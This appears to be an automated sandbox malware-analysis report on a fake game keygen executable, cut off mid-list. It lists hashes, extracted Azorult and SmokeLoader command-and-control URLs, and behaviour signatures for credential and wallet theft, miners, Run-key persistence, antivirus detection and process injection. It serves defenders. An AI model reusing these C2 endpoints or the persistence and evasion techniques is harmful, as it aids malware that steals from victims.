Analysis
-
max time kernel
190s -
max time network
298s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
04-04-2021 18:22
Static task
static1
Behavioral task
behavioral1
Sample
Big_Buck_Hunter_Pro_v3_0_10_keygen_by_Inferno.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Big_Buck_Hunter_Pro_v3_0_10_keygen_by_Inferno.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Big_Buck_Hunter_Pro_v3_0_10_keygen_by_Inferno.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Big_Buck_Hunter_Pro_v3_0_10_keygen_by_Inferno.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
Big_Buck_Hunter_Pro_v3_0_10_keygen_by_Inferno.exe
Resource
win7v20201028
General
-
Target
Big_Buck_Hunter_Pro_v3_0_10_keygen_by_Inferno.exe
-
Size
5.2MB
-
MD5
c9d0760f5504d9e8ce237543fc4e7562
-
SHA1
12dac9b23d9f95b9647767e15a265a73380ad50b
-
SHA256
2519f6e84956fd35aaf7aa0ac51c2ce4cd8fddc973933936560ddb1efff6a16f
-
SHA512
28e06d8763858601484ec3675b5d0895712b616d69b36d4c584f32dfb56dfe9a7c26ad05dfda27efc2e9512c11d7dedcafd4d69d98baffdda8eb5af9ba99398a
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/5148-201-0x0000000002700000-0x000000000300A000-memory.dmp family_glupteba behavioral2/memory/5148-202-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral2/memory/5148-203-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
XMRig Miner Payload 4 IoCs
Processes:
resource yara_rule behavioral2/memory/3740-142-0x00000001402CA898-mapping.dmp xmrig behavioral2/memory/3740-141-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/3740-147-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/3740-218-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Blocklisted process makes network request 6 IoCs
Processes:
msiexec.exeMsiExec.exeflow pid process 119 3740 msiexec.exe 184 884 MsiExec.exe 197 884 MsiExec.exe 237 884 MsiExec.exe 239 884 MsiExec.exe 241 884 MsiExec.exe -
Drops file in Drivers directory 2 IoCs
Processes:
Microsoft.exe2.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts Microsoft.exe File opened for modification C:\Windows\system32\drivers\etc\hosts 2.exe -
Executes dropped EXE 64 IoCs
Processes:
keygen-pr.exekeygen-step-1.exekeygen-step-3.exekeygen-step-4.exekey.exeSetup.exemultitimer.exesetups.exesetups.tmpaskinstall20.exemultitimer.exemultitimer.exeFull_Version.exefile.exeD8F1.tmp.exeDBC0.tmp.exe4hwdecwinxm.exevict.execpyrix.exeo2cudfg1p0z.exeSetup3310.exeapp.exedmtzmsnvpdi.exe4hwdecwinxm.tmpSetup3310.tmpvict.tmpIBInstaller_97039.exeIBInstaller_97039.tmphqm5br3cap4.exevpn.exevpn.tmpwin1host.exewinlthsth.exeSetup.exemd2_2efs.exehjjgaa.exeRunWW.exejg7_7wjg.exeLabPicV3.exelylal220.exe22.exeguihuali-game.exeHookSetp.exeThree.exeLabPicV3.tmplylal220.tmp0Jm5LQEyZe9W.exe1.exe2.exejfiag3g_gg.exeMicrosoft.exe2.exemultitimer.exesetups.exesetups.tmpjfiag3g_gg.exe1.exe1.exe2.exetapinstall.exemultitimer.exemultitimer.exeirecord.exePunyrazhewy.exepid process 4064 keygen-pr.exe 4080 keygen-step-1.exe 3488 keygen-step-3.exe 4412 keygen-step-4.exe 1616 key.exe 1800 Setup.exe 4648 multitimer.exe 4624 setups.exe 216 setups.tmp 4308 askinstall20.exe 4576 multitimer.exe 1216 multitimer.exe 1180 Full_Version.exe 2264 file.exe 1912 D8F1.tmp.exe 2668 DBC0.tmp.exe 4476 4hwdecwinxm.exe 844 vict.exe 2640 cpyrix.exe 528 o2cudfg1p0z.exe 1968 Setup3310.exe 5148 app.exe 5164 dmtzmsnvpdi.exe 5184 4hwdecwinxm.tmp 5216 Setup3310.tmp 5264 vict.tmp 5356 IBInstaller_97039.exe 5408 IBInstaller_97039.tmp 5560 hqm5br3cap4.exe 5732 vpn.exe 5840 vpn.tmp 5856 win1host.exe 5908 winlthsth.exe 3524 Setup.exe 2208 md2_2efs.exe 4512 hjjgaa.exe 4664 RunWW.exe 3592 jg7_7wjg.exe 5388 LabPicV3.exe 5364 lylal220.exe 5440 22.exe 5484 guihuali-game.exe 5544 HookSetp.exe 4504 Three.exe 3116 LabPicV3.tmp 5244 lylal220.tmp 5716 0Jm5LQEyZe9W.exe 4176 1.exe 4700 2.exe 4380 jfiag3g_gg.exe 744 Microsoft.exe 2452 2.exe 3392 multitimer.exe 5296 setups.exe 972 setups.tmp 5188 jfiag3g_gg.exe 3304 1.exe 5420 1.exe 4472 2.exe 5696 tapinstall.exe 6128 multitimer.exe 4432 multitimer.exe 5384 irecord.exe 776 Punyrazhewy.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
1.exesetups.tmpdescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation 1.exe Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp -
Loads dropped DLL 54 IoCs
Processes:
setups.tmprundll32.exe4hwdecwinxm.tmpSetup3310.tmpvict.tmpIBInstaller_97039.tmphqm5br3cap4.exevpn.tmpMsiExec.exelylal220.tmpLabPicV3.tmpsetups.tmprundll32.exerundll32.exeMsiExec.exevict.tmpSetup3310.tmpvpn.tmptoolspab1.exepid process 216 setups.tmp 216 setups.tmp 216 setups.tmp 216 setups.tmp 216 setups.tmp 216 setups.tmp 216 setups.tmp 232 rundll32.exe 5184 4hwdecwinxm.tmp 5216 Setup3310.tmp 5216 Setup3310.tmp 5264 vict.tmp 5408 IBInstaller_97039.tmp 5560 hqm5br3cap4.exe 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 4692 MsiExec.exe 4692 MsiExec.exe 5244 lylal220.tmp 4692 MsiExec.exe 3116 LabPicV3.tmp 972 setups.tmp 972 setups.tmp 972 setups.tmp 972 setups.tmp 972 setups.tmp 972 setups.tmp 972 setups.tmp 3352 rundll32.exe 6096 rundll32.exe 884 MsiExec.exe 884 MsiExec.exe 884 MsiExec.exe 884 MsiExec.exe 884 MsiExec.exe 884 MsiExec.exe 884 MsiExec.exe 884 MsiExec.exe 884 MsiExec.exe 884 MsiExec.exe 6628 vict.tmp 6700 Setup3310.tmp 6700 Setup3310.tmp 6908 vpn.tmp 6908 vpn.tmp 6908 vpn.tmp 6908 vpn.tmp 1864 toolspab1.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
Processes:
multitimer.exeMicrosoft.exe2.exe7476647.exemultitimer.exeD8F1.tmp.exehjjgaa.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\0p1zulfuhe0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\WHCYBEXA3M\\multitimer.exe\" 1 3.1617560687.606a046f31bfb" multitimer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\MaskVPN\\Wyzhyshaeshaelae.exe\"" Microsoft.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Media Player\\Soquluwixu.exe\"" 2.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe" 7476647.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\gqgxnhjsakc = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\P8K0PL31T3\\multitimer.exe\" 1 3.1617560608.606a0420d9c46" multitimer.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run D8F1.tmp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\wwwupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\wwwupdat3.exe" D8F1.tmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" hjjgaa.exe -
Checks for any installed AV software in registry 1 TTPs 64 IoCs
Processes:
multitimer.exemultitimer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
1.exemd2_2efs.exejg7_7wjg.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg7_7wjg.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exehqm5br3cap4.exedescription ioc process File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: hqm5br3cap4.exe File opened (read-only) \??\R: hqm5br3cap4.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\I: hqm5br3cap4.exe File opened (read-only) \??\J: hqm5br3cap4.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\H: hqm5br3cap4.exe File opened (read-only) \??\W: hqm5br3cap4.exe File opened (read-only) \??\M: hqm5br3cap4.exe File opened (read-only) \??\Y: hqm5br3cap4.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: hqm5br3cap4.exe File opened (read-only) \??\E: hqm5br3cap4.exe File opened (read-only) \??\X: hqm5br3cap4.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\K: hqm5br3cap4.exe File opened (read-only) \??\O: hqm5br3cap4.exe File opened (read-only) \??\G: hqm5br3cap4.exe File opened (read-only) \??\S: hqm5br3cap4.exe File opened (read-only) \??\T: hqm5br3cap4.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\B: hqm5br3cap4.exe File opened (read-only) \??\F: hqm5br3cap4.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: hqm5br3cap4.exe File opened (read-only) \??\Z: hqm5br3cap4.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\P: hqm5br3cap4.exe File opened (read-only) \??\Q: hqm5br3cap4.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\L: hqm5br3cap4.exe File opened (read-only) \??\U: hqm5br3cap4.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 243 ipinfo.io 248 ipinfo.io 102 ipinfo.io 109 ipinfo.io 151 ip-api.com -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
multitimer.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Drops file in System32 directory 3 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\FQG3XYS2.cookie svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\FQG3XYS2.cookie svchost.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
svchost.exeD8F1.tmp.exe0Jm5LQEyZe9W.exe1.exe2.exetoolspab1.exetoolspab1.exedescription pid process target process PID 4840 set thread context of 5056 4840 svchost.exe svchost.exe PID 1912 set thread context of 3740 1912 D8F1.tmp.exe msiexec.exe PID 1912 set thread context of 708 1912 D8F1.tmp.exe msiexec.exe PID 5716 set thread context of 4044 5716 0Jm5LQEyZe9W.exe AddInProcess32.exe PID 4176 set thread context of 5420 4176 1.exe 1.exe PID 4700 set thread context of 4472 4700 2.exe 2.exe PID 6420 set thread context of 1864 6420 toolspab1.exe toolspab1.exe PID 5268 set thread context of 6524 5268 toolspab1.exe toolspab1.exe -
Drops file in Program Files directory 64 IoCs
Processes:
vpn.tmpSetup.exeirecord.tmpjg7_7wjg.exeSetup.exeIBInstaller_97039.tmpguihuali-game.exeMicrosoft.exeFull_Version.exevict.tmp4hwdecwinxm.tmpvict.tmp2.exeprolab.tmpdescription ioc process File opened for modification C:\Program Files (x86)\MaskVPN\ipseccmd.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-MTSM2.tmp vpn.tmp File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe Setup.exe File created C:\Program Files (x86)\I-record\unins000.dat irecord.tmp File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\d.INTEG.RAW jg7_7wjg.exe File opened for modification C:\Program Files (x86)\I-record\avdevice-53.dll irecord.tmp File opened for modification C:\Program Files (x86)\I-record\avutil-51.dll irecord.tmp File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe Setup.exe File opened for modification C:\Program Files (x86)\Install engine 16\networkinspection.dll IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\ssleay32.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-R3TN9.tmp vpn.tmp File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe Setup.exe File opened for modification C:\Program Files\unins0000.dll guihuali-game.exe File created C:\Program Files (x86)\I-record\is-KIRO6.tmp irecord.tmp File opened for modification C:\Program Files (x86)\Install engine 16\unins000.dat IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\is-FH153.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-P7DEE.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-97QQ6.tmp vpn.tmp File opened for modification C:\Program Files (x86)\I-record\avcodec-53.dll irecord.tmp File created C:\Program Files (x86)\Install engine 16\is-1VR09.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\Install engine 16\is-E38UB.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\I-record\is-EC1C4.tmp irecord.tmp File created C:\Program Files\Microsoft Office\MASYZAAIFV\irecord.exe Microsoft.exe File created C:\Program Files (x86)\MaskVPN\Wyzhyshaeshaelae.exe.config Microsoft.exe File created C:\Program Files (x86)\I-record\is-5PD75.tmp irecord.tmp File created C:\Program Files\unins.vbs Full_Version.exe File opened for modification C:\Program Files (x86)\Install engine 16\getithelper260.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\Install engine 16\unins000.dat IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\mask_svc.exe vpn.tmp File created C:\Program Files\dcpr.dll guihuali-game.exe File created C:\Program Files (x86)\I-record\is-GDEPM.tmp irecord.tmp File opened for modification C:\Program Files (x86)\I-record\unins000.dat irecord.tmp File opened for modification C:\Program Files (x86)\viewerise\unins000.dat vict.tmp File created C:\Program Files (x86)\Install engine 16\is-1EDS2.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\Install engine 16\is-N99JA.tmp IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-50E1D.tmp vpn.tmp File opened for modification C:\Program Files (x86)\I-record\LinqBridge.dll irecord.tmp File created C:\Program Files (x86)\Install engine 16\is-16SF9.tmp IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\viewerise\NDP472-KB4054531-Web.exe 4hwdecwinxm.tmp File created C:\Program Files (x86)\viewerise\is-2TE87.tmp vict.tmp File created C:\Program Files\Microsoft Office\AXQILRKWTC\prolab.exe.config 2.exe File opened for modification C:\Program Files (x86)\I-record\avfilter-2.dll irecord.tmp File created C:\Program Files (x86)\Picture Lab\is-6GSVD.tmp prolab.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-LMQ53.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-G5B9H.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-B8S3L.tmp vpn.tmp File opened for modification C:\Program Files (x86)\Picture Lab\WeifenLuo.WinFormsUI.dll prolab.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-DOH3L.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\unins000.msg vpn.tmp File created C:\Program Files\Microsoft Office\AXQILRKWTC\prolab.exe 2.exe File created C:\Program Files (x86)\viewerise\unins000.dat 4hwdecwinxm.tmp File created C:\Program Files (x86)\viewerise\unins001.dat vict.tmp File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPN.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-DLVCC.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-SSKNB.tmp vpn.tmp File opened for modification C:\Program Files (x86)\I-record\Bunifu_UI_v1.52.dll irecord.tmp File created C:\Program Files (x86)\Picture Lab\unins000.dat prolab.tmp File created C:\Program Files (x86)\Picture Lab\is-AK6RM.tmp prolab.tmp File created C:\Program Files (x86)\viewerise\is-SHPT8.tmp 4hwdecwinxm.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libMaskVPN.dll vpn.tmp File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe Setup.exe File created C:\Program Files (x86)\I-record\is-3J6PV.tmp irecord.tmp -
Drops file in Windows directory 26 IoCs
Processes:
msiexec.exetapinstall.exemultitimer.exeexpand.exe1.exemultitimer.exeMicrosoftEdge.exedescription ioc process File opened for modification C:\Windows\Installer\MSIA5B7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE5C0.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF458.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log tapinstall.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File opened for modification C:\Windows\Logs\DPX\setuperr.log expand.exe File opened for modification C:\Windows\Installer\MSIDFA5.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI38BB.tmp msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT 1.exe File opened for modification C:\Windows\Installer\MSIF64D.tmp msiexec.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File opened for modification C:\Windows\Installer\MSI22EC.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI27CF.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File opened for modification C:\Windows\Logs\DPX\setupact.log expand.exe File opened for modification C:\Windows\Installer\f759413.msi msiexec.exe File opened for modification 